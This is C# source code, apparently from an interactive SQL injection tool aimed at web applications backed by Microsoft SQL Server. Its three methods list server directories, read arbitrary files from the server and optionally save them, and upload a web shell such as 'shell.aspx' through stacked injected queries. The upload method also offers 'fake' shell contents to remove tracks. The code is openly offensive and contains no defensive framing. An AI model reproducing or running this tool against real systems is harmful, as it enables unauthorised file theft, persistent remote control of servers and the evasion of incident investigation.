public static void initialize(string url) { Log.logNotification("Confirming Web Response.."); var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement)) { Log.logNotification("Web Response is OK.."); if (createFuncDir(url)) { string UserChoice = "z"; while (UserChoice != "x") { UserChoice = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. "); if (UserChoice != "x") { navigate(url, UserChoice); } } dropObject(url, QueriesDB.DropFuncQuery); } } else { Log.logError("No response from the server.."); } }
public static void Read(string url) { string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery); string UserChoice = "z"; while (UserChoice != "x") { UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext .."); if (UserChoice != "x") { string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice); var response = HTTPMethods.getResponse(FinalFileReadURL); if (response != null) { response = ResponseFilter.getPureResponseWithLastIndex(response); if (response != null) { Log.logOutput("--- [File Contents Start] ---"); Log.logOutput(response); Log.logOutput("--- [File Cotents End] ---"); UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore.."); if (UserChoice == "s") { SaveFile(response); } UserChoice = "z"; } else { Log.logError("Either File is empty or you 've no right to read that File.."); } } } } }
public static void Spawn(string url) { Log.logNotification("Confirming Web Response.."); var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement)) { Log.logNotification("Web Response is OK.."); if (createProcFcUk(url)) { string RootPath = "z"; while (RootPath != "x") { RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ "); if (RootPath != "x") { string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx .."); string UrlForUploading = null; string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks.."); if (x == "f") { UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE); } else { UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL); } UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath); UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName); UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement); Log.logNotification("Uploading shell to " + RootPath + fileName); if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement)) { Log.logNotification("Confirming File Upload.."); if (confirmFileUpload(url, RootPath + fileName)) { Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName); } else { Log.logError("Fail to upload file.."); } } } } } dropObject(url, QueriesDB.DropFcUkProcQuery); } else { Log.logError("No response from the server.."); } }